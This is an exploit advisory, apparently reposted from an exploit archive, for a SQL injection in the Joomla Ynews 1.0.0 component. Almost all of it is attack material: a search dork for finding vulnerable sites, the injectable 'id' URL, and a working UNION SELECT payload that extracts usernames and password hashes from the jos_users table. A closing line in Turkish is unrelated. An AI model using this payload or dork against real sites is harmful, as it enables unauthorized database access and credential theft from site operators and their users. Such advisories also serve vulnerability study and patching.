id: 2608
date: 02/06/2008
title: Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
author: Crackers_Child
cves: 

====================================================================
Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
====================================================================



###########################################################################################
###    Title   : Joomla Component Ynews 1.0.0  (id) Remote SQL Injection Vulnerability
###
###    Author  : By Crackers_Child 
###                                      
###    Dork    : inurl:index.php?option=com_ynews
###
###    Exploit : /index.php?option=com_ynews&Itemid=0&task=showYNews&id=SQL
###      
###    SQL     : -1/**/union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
###
###    Note    : Kac Kere olDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . .
###########################################################################################





#  0day.today [2023-03-23]  #